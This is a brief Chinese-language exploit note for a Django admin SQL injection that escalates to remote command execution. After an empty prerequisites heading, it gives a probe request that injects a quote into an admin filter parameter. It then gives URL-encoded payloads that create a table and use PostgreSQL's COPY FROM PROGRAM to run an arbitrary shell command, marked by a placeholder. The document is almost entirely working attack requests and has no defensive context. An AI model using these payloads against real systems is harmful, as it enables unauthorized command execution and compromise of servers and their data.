前言

Python的Django框架远程命令执行漏洞利用

漏洞利用前提

poc

request
1
GET http://example.com/admin/vuln/collection/?detail__x%27x=x
  • 如果访问页面报错说明有注入点

exp

  • 创建一个cmdshell
request
1
GET http://example.com/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20
  • 远程命令执行

<shell>:远程执行的Shell命令

request
1
GET http://example.com/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27<shell>%27--%20

完成